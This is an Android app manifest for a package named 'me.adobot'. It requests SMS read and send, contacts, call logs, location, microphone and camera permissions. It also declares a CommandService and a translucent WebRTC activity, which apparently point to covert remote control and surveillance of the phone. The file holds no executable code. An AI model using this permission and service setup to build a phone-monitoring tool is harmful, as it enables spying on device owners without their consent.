<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="me.adobot">

    <uses-permission
        android:name="android.permission.ACCESS_FINE_LOCATION"
        android:required="true" />
    <uses-permission
        android:name="android.permission.ACCESS_COARSE_LOCATION"
        android:required="true" />
    <uses-permission
        android:name="android.permission.ACCESS_NETWORK_STATE"
        android:required="true" />
    <uses-permission
        android:name="android.permission.INTERNET"
        android:required="true" />
    <uses-permission
        android:name="android.permission.READ_SMS"
        android:required="true" />
    <uses-permission
        android:name="android.permission.SEND_SMS"
        android:required="true" />
    <uses-permission
        android:name="android.permission.READ_CONTACTS"
        android:required="true" />
    <uses-permission
        android:name="android.permission.WRITE_CONTACTS"
        android:required="true" />
    <uses-permission
        android:name="android.permission.READ_CALL_LOG"
        android:required="true" />
    <uses-permission
        android:name="android.permission.WRITE_CALL_LOG"
        android:required="true" />
    <uses-permission
        android:name="android.permission.READ_PHONE_STATE"
        android:required="true" />
    <uses-permission
        android:name="android.permission.READ_EXTERNAL_STORAGE"
        android:required="true" />
    <uses-permission
        android:name="android.permission.WRITE_EXTERNAL_STORAGE"
        android:required="true" />
    <uses-permission
        android:name="android.permission.RECORD_AUDIO"
        android:required="true" />
    <uses-permission
        android:name="android.permission.CAMERA"
        android:required="true" />
    <uses-permission
        android:name="android.permission.FLASHLIGHT"
        android:required="true" />

    <uses-feature
        android:name="android.hardware.camera2.full"
        android:required="false" />
    <uses-feature
        android:name="android.hardware.camera.autofocus"
        android:required="false" />
    <uses-feature
        android:name="android.hardware.camera.flash"
        android:required="false" />

    <application
        android:allowBackup="true"
        android:fullBackupContent="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name=".activities.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <action android:name="android.intent.action.VIEW" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <activity android:name=".activities.PermissionsActivity" />

        <activity
            android:name=".activities.WebRTC"
            android:theme="@android:style/Theme.Translucent.NoTitleBar" />

        <service android:name=".CommandService" />

    </application>
</manifest>